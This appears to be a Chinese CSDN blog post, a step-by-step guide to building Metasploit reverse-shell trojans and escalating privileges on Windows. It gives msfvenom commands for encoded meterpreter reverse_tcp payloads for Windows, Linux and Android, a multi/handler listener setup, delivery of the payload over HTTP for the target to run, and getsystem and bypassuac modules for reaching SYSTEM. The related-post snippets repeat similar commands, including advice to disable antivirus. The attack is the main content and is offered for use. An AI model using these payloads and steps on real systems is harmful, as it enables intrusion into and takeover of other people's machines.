生成木马反弹和简单的Windows提权

最新推荐文章于 2024-04-08 15:50:25 发布
最新推荐文章于 2024-04-08 15:50:25 发布
阅读量605 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BRMTSW/article/details/129286142
版权

Windows版

1、打开msf

2、use exploit/multi/handler

3、set payload windows/meterpreter/reverse_tcp

4、设置监控机ip:set lhost ip

5、设置监控机端口(和木马一致):set lport 端口号

 

6、生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai -f exe -o new.exe -i 5

 

7、启动http服务

8、靶机下载

 

 

9、监控机run得到meterperter

Linux版

和前面Windows一样,不同点有:

1、木马生成不同

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} -f elf > shell.elf

2、payload模块

set payload linux/x64/meterpreter/reverse_tcp

 可能需要给文件赋权

Android版

同理,不同点有:

1、木马生成板块

msfvenom -p android/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} R>k.apk

2、payload模块

set payload android/meterpreter/reverse_tcp

最后都是下载木马后面执行即可!!!!

Windows提权

1 提权方法(Windows)查看当前获得用户的权限 meterpreter 中输入: getuid

方法一:

meterpreter中输入:getsystem

方法二、使用msf模块提权

要想提权必须是已经拿到meterpreter 然后将当前meterpreter 后台 meterprerer中输入 background(bg)

1、 查看可用模块 MSF终端中输入 search bypassuac 查看提权模块

2、 选择一个适合当前系统的提权模块 我这边使用的是win10系统

那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权

这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack

或者 use exploit/windows/local/bypassuac_dotnet_profiler

3 配置模块使用参数 终端内输入: show options

4 可以看到需要配置 session 终端内输入:set session {需要提权的session id}

5 执行提权 终端内输入:run

6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限

7 获取权限完成后 输入getuid 即可看到 已经获取到SYSTEM 最高权限了

BRMTSW
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹木马工具
07-31
反弹木马,渗透神器,用作网络攻防练习使用,建议放入虚拟机安装
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6356
生成木马进行植入
Windows,网络安全编程基础
m0_60607895的博客
04-08 895
msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马:伪装成cmd.exemsfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4091
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
使用反弹木马进行
forget_mt的博客
11-24 4131
渗透机:kail ip:172.16.5.6 靶 机:linux ip:172.16.5.7 客户端:windows XP ip: 172.16.5.128 通过Nikto对服务器80端口进行扫描: nikto-hosthttp://172.16.1.200 发现了login.php文件与phpmyadmin/目录 所以直接在浏览器中访问login.php sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -...
68-68.渗透测试-生成木马获取shell(Windows).mp4
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
防止aspxspy木马列服务 iis信息 执行命令等操作
09-30
处于安全考虑,对服务器安全进行设置。上传aspxspy测试
89-89.渗透测试-通过木马反弹shell(Android).mp4
最新发布
05-10
89-89.渗透测试-通过木马反弹shell(Android).mp4
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
反弹木马原理_Metasploit -- 木马生成原理和方法
weixin_39986027的博客
12-22 1073
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。---- 网易云热评一、生成方式:利用msf模块中的msfvenom模块二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标...
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
经典反向后门源代码(可用)vc++6.0反弹木马
利用msf生成木马后门获取目标机控制
m0_73385645的博客
08-31 227
输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地ip lport=自定义端口 -f exe -o demo9999.exe。将目标程序放入目标机 (注意关闭安全中心病毒扫描设置,否则木马程序会被清除)demo9999.exe 木马后门程序的名称。windows 目标机器系统版本。-f 输出木马文件的格式。当目标机打开exe木马后门时会有如下示。此时已经拿到目标机的操作限。3.拿到目标机控制限。
反弹shell木马免杀python版
游魂的博客
12-10 1153
反弹shell木马免杀python版 本人自己写的反弹shell工具,技术有限,目前只能反弹一个shell,还没深入研究,不过过程中一个shell足够了,毕竟不是远控管理工具。 最新版本的,确实是免杀的。 话不多说,看操作: 第一步打开服务端本地运行server.exe程序。 不修改端口的话回车即可。 端口已经在监听了,等待shell连接。 第二步将反弹shell木马传到网站上运行,c...
msf下Windows
wjq18827615690的博客
03-18 251
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
使用MSF进行windows、linux、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
msf windows方法总结
qq_45951598的博客
06-18 2732
简介 可分为纵向与横向:纵向:低限角色获得高限角色的限;横向:获取同级别角色的限。 Windows常用的方法有:系统内核溢出漏洞、数据库、错误的系统配置、组策略首选项、WEB中间件漏洞、DLL劫持、滥用高危限令牌、第三方软件/服务等 1.getsystem 这里使用getsystem命令试一下,运气好的话可能就到了system 2.bypassuac 内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
msf实战windows_推荐一个渗透测试实战平台
weixin_39794130的博客
11-21 311
原创: kid 合天智汇18年毕业,目前某安全公司PM搬砖,但依然钟情于渗透,希望能通过学习不断高自己的技术。因为一开始研究的是渗透,但还是太菜。大佬师傅当小说看就好。目前实战操作来源vunlhub及handthebox,均须爬楼,我是自己搭的楼梯。Guge和油管以及推特都是很好的平台,油管上太多牛逼的人。。。CTF也会偶尔看,如果有师傅带着玩和打比赛,愿意跟着搬砖打杂。。靶机下载地址:http...
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御
weixin_30693683的博客
05-21 334
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御 实践规划 通过自学,掌握木马的攻击原理,初步实现一个反弹木马,主要分为服务器端(靶机)、客户端(攻击者)和一个代理服务器端,其中客户端包括控制程序和配置程序两部分,代理服务器端供转发数据功能以防止反跟踪。 我要开始赶鸭子上架了 初步规划做一个针对windows的远程控制型第六代木马,利用网页脚本植入,不采用...
Metasploit和Cobalt Strike生成木马的过程
03-25
Metasploit控制台供了各种服务和模块,可以生成不同类型的木马程序。要使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole”命令启动控制台,然后使用“search”命令搜索...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值